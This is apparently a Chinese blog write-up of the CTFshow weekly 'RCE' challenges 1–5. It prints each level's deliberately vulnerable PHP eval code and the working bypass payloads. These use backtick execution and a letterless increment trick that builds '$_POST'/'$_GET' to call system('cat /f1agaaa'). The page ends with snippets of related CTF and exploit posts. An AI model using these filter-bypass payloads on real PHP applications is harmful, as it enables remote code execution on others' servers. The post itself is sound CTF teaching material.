CTFSHOW每周大挑战——RCE篇

已于 2023-05-08 23:11:21 修改
阅读量2.6k 收藏 7
点赞数 3
文章标签: web安全 网络安全 安全
于 2022-11-21 10:38:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61955196/article/details/127932968
版权

RCE1:过滤了括号,不能使用system(),可以用反引号搭配echo使用回显flag

payload:echo `cat /f*`;

RCE2:

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow)) {
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

过滤了很多东西呢,通过正则表达式匹配发现还有

' () + , . ; = [] _

上面还有提示,吃瓜杯Y4的shellme_revenge,想到用自增的方法

(32条消息) 【CTF】通过符号构造字母数字_吃_早餐的博客-CSDN博客

构造出来$_GET[_]($_GET[__]);然后直接命令执行即可

payload:post

$_=''.[];
$_=$_['_'];
$_++;
$_++;
$_++;
$__=++$_;
$_++;
$___=++$_;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_++;
$_=_.$___.$__.$_;
$$_[_]($$_[__]);

注意post用url编码后使用。

get:?_=system&__=cat /f*;

后面三个卡住了,师傅们都tql

RCE3:

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 105) {
        if (!preg_match("/[a-zA-Z2-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

这次是不仅过滤了而且还有字数限制。先正则匹配一下得到

() + , . / 0 1 ; = [] _

这次放出来了0 1,'被禁了。还是用自增的方法但是和前面有点不太一样了。因为有了长度限制,所以要用更短的方式。直觉上可能会觉得GET比POST短会用更少字符,但是因为从N开始后OPST都有,POST更容易用更少的字数得到,所以使用POST。

​
$a=(0/0);//NAN
$a.=_;//NAN_
$a=$a[0];//N
$a++;//O
$o=$a++;//$o=$a++是先把$a的值给$o,然后再对$a进行自增,所以这一句结束的时候 $a是P,$o是O
$p=$a++;//$a=>Q,$p=>P
$a++;$a++;//R
$s=$a++;//S
$t=$a;//T
$_=_;//_
$_.=$p.$o.$s.$t;//_POST
$$_[0]($$_[1]);//$_POST[0]($_POST[1]);

​

用burp把a换成不可见字符(如%ff %fe等),url编码中+会被替换成空格,所以要换成%2b

payload:

ctf_show=$%ff=(0/0);$%ff.=_;$%ff=$%ff[0];$%ff%2b%2b;$%fd=$%ff%2b%2b;$%fe=$%ff%2b%2b;$%ff%2b%2b;$%ff%2b%2b;$%fc=$%ff%2b%2b;$%fb=$%ff;$_=_;$_.=$%fe.$%fd.$%fc.$%fb;$$_[0]($$_[1]);&0=system&1=cat /f1agaaa

RCE4:

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 84) {
        if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

比上一个少了1,而且字符数要求更少了。所以需要我们压缩得更短。不影响我们使用(0/0)来构造NAN, 但是更为优秀的写法可以是$a=(_/_._)[0];直接得到字母N,payload构造过程:

$a=(_/_._)[0];//直接拼接成字符串并切片
$o=++$a;//$o=++$a是先把$a进行自增,自增完成之后再将值返回,也就是这一句结束的时候 $a和$o都是O
$o=++$a.$o;//$o=>PO,$a=>P
$a++;//Q
$a++;//R
$o.=++$a;//$o=>POS,$a=>S
$o.=++$a;//$o=>POST,$a=>T
$_=_.$o;//_POST
$$_[0]($$_[_]);//$_POST[0]($_POST[_]);

payload:

ctf_show=$%ff=(_/_._)[0];$%fe=%2b%2b$%ff;$%fe=%2b%2b$%ff.$%fe;$%ff%2b%2b;$%ff%2b%2b;$%fe.=%2b%2b$%ff;$%fe.=%2b%2b$%ff;$_=_.$%fe;$$_[0]($$_[_]);&0=system&_=cat /f1agaaa

RCE5:

<?php
//本题灵感来自研究Y4tacker佬在吃瓜杯投稿的shellme时想到的姿势,太棒啦~。
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    if (is_string($ctfshow) && strlen($ctfshow) <= 73) {
        if (!preg_match("/[a-zA-Z1-9!'@#%^&*:{}\-<\?>\"|`~\\\\]/",$ctfshow)){
            eval($ctfshow);
        }else{
            echo("Are you hacking me AGAIN?");
        }
    }else{
        phpinfo();
    }
}
?>

要求更少了,但是phpinfo中多了个gettext()扩展插件,使得我们可以用_()直接转为字符串

payload:

ctf_show=$%ff=_(%ff/%ff)[%ff];$_=%2b%2b$%ff;$_=_.%2b%2b$%ff.$_;$%ff%2b%2b;$%ff%2b%2b;$_.=%2b%2b$%ff.%2b%2b$%ff;$$_[_]($$_[%ff]);&_=system&%ff=cat /f1agaaa

注意一下:因为不可见字符的原因,所以要用bp来做,hackbar可能会和我一样出现 url malformed CLOSE,用bp做的时候注意+会被替换成空格所以要编码外,还有用不可见字符替换过滤得字母(为了使得字符数更短才用的),其他直接post提交即可。

后面群里的大佬还有更短的payload,直接压到了72位构造如下:

<?php
$a=_(a/a)[a];//N
++$a;//O
$_=$a.$a++;//PO
$a++;$a++;//R
$_.=_.$_++$a.++$a;//_POST
$$_[a]($$_[_]);//$_POST[a]($_POST[_])

$_=$a.$a++;//PO

至于为什么是得到PO而不是OP或者OO之类的,官方wp上师傅们讨论的结果是:

PHP在做字符串拼接的过程中(.操作),是一个从左到右递归的过程,而++操作类似于一个函数,php在执行完函数后,再做拼接的操作,$_=$a.$a++;//PO这里相当于先执行了$a++操作(函数),并得到$a++的返回值,然后和左侧的$a变量进行拼接,此时$a已经是P了。而$_=_.$a.$a++;时先执行了_$a的拼接,而后再执行$_='_O'.$a++,所以得到的是_OO。*以上所有均为猜测,具体机制需研究PHP源码。

总结:对于无数字字母rce有了更进一步的了解,可以用自增的方法解决,还有不可见字符代替得到更小的字符数。当然如果其他的被禁掉了,还有异或、$PATH、或、取反等方法来解决问题。

参考文章:

Docs (feishu.cn)

(33条消息) ctfshow RCE极限挑战 wp_练习两年半的篮球选..哦不对安全选手的博客-CSDN博客

(最后一篇文章的师傅RCE1-4都可以用hackbar,5实在要求太短只能用不可见字符才用bp)

My4n
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
网络安全 | CTF】攻防世界 php_rce 解题详析
等风来
05-22 5279
PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),此时通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器的控制。由上图可知,flag字段储存在flag文件夹下的flag文件中。使用thinkphp 5.1.payload进行尝试,根据提示,使用5.0.20版本的Payload。说明命令执行成功,接着抓取flag即可。
ctfshow--RCE极限挑战
bossDDYY的博客
11-20 1624
使用A的话构造GET肯定是无法小于105 那么可以尝试构造POST。phpinfo安装了一个扩展gettext,该扩展支持函数。,我们可以利用反引号执行命令 echo输出。我们跑一下 看看哪些字符没有被过滤。要保证构造payload长度小于。限制字符的自增 对于我来说较难。fuzz测试哪些字符没有被过滤。另外更有大佬的payload。fuzz测试什么没有被过滤。限制传入的参数长度小于等于。fuzz测试,可用字符。构造的payload。
CTF中WEB题——RCE
tomyyyyy
10-31 5889
CTF中WEB题——RCE 目录CTF中WEB题——RCE相关函数命令执行代码注入绕过方式空格命令分隔符关键字限制长度限制回显无字母、数字getshell异或取反自增实例相关函数 命令执行 system() #string system ( string $command [, int &$return_var ] ) #system()函数执行有回显,将执行结果输出到页面上 &lt...
ctfshow 每周挑战 极限命令运行
2301_81040377的博客
04-24 453
然后进行合理的手段只有01不难想到是二进制,然后我们再转换为刚才的八进制来执行命令。我们的目的是构造命令cat /flag。然后这里我们发现可以取反获得数字0 1。我们都可以直接执行8进制的了。没有通配符了,但是可以通过。是ascii字母的8进制值。现在直接用${##}替换1。先用脚本跑出这些东东能用。然后要找出1就能有答案了。跑完脚本发现这些可以用。的方式执行命令,其中。
CTF_WEB学习-------------RCE之命令注入
qq_45616570的博客
07-14 2853
CTF_WEB学习-------------RCE之命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令(执行ping命令)和远程代码执行eval。 RCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
CTFhub-RCE漏洞详解
qq_49422880的博客
05-19 2437
CTFHUB-RCE漏洞详解(一)一、eval执行二、文件包含三、php://input   RCE英文全称:remote command/code execute(远程命令/代码执行漏洞)是互联网的一种安全漏洞。   它可以让攻击者直接向后台服务器远程注入操作系统命令,相当于直接操控服务器电脑的cmd命令行!从而操控后台系统,高危漏洞!   RCE漏洞产生的根本原因:服务器像php环境版本对可执行变量函数没有做过滤,导致在没有自定义相对路径的情况下就运行命令去执行,从而导致服务器被入侵。 一、eval执行
通达OA的未授权、有限制未授权、upload——rce的poc.rar
09-02
通达OA的未授权、有限制未授权、upload——rce
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
ctfshow RCE极限挑战 wp
m0_64815693的博客
11-20 3631
ctfshow rce极限挑战 1-5 wp
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 825
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
【CTF】命令执行RCE
qq_53099119的博客
04-02 2571
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
ctf攻防世界 WEB题:php_rce
qq_30889301的博客
05-09 889
ThinkPHP是一个基于PHP语言的开源Web应用框架,它提供了一系列的工具和组件,可以帮助开发人员更快速、更高效地构建Web应用程序。ThinkPHP框架具有简单易用、高效稳定、安全可靠等特点,被广泛应用于各种Web应用程序的开发中。对于thinkphp框架Github上有一个专用的漏洞验证工具:https://github.com/zangcc/Aazhen-v3.1。进入靶场后会看到以下内容,非常直观的说明了自己是thinkphp框架。此工具已经给一个可用的url案例,我们只需要更改就可以了。
CTFHub技能树笔记之RCE:命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8334
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令都执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
SWPUCTF 2021 新生赛 RCE题目
m0_74160536的博客
05-26 573
查看代码,这段 PHP 代码接受一个名为 “url” 的 GET 请求参数,然后使用 preg_match 函数对该参数进行正则匹配,检查其中是否包含一些危险的命令和特殊符号,比如 bash、nc、wget、ping、ls、cat、more、less、phpinfo、base64、echo、php、python、mv、cp、la、-、*、"、>、
CTFweb无参数RCE
遇事不决冲冲冲
07-25 2876
1 打开题目便是源代码,通过a的参数来实现RCE <?php #-*-coding: utf-8 -*- //flag in show_flag.php if(isset($_POST['a'])){ $a=$_POST['a']; if (!(preg_match("/[0-9]|\.|data|phar|glob|\*|system|shell_exec|shell|php|\`/i", $a))) { eval($a); } }else{ hig
RCE过滤及文件包含
weixin_51313108的博客
08-14 1329
ctf中的一些RCE过滤有关过滤的题目过滤的一些思考管道符的妙用;分号被过滤cat被过滤空格被过滤flag被过滤求助大佬博客 有关过滤的题目 BUUCTF pingpingping ctfhub RCE 过滤的一些思考 ctf题中会有一些SQL关键字的过滤,找到过滤的内容是非常有必要的。做题中如果可以查看到其他文件的代码或许可以知道过滤些什么关键字。(如:index.php,当前所在的php文件)。 管道符的妙用 ; & && | ||:这些管道符衔接其他命令可以执行一些Linux代
ctfshow RCE极限挑战
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的控制。其中,ctfshow是一个POST参数,用于接收选手注入的代码。如果选手注入的代码中包含恶意代码,就可以实现RCE攻击。这个挑战的难度较高,需要选手具备一定的安全知识和技能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

My4n

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值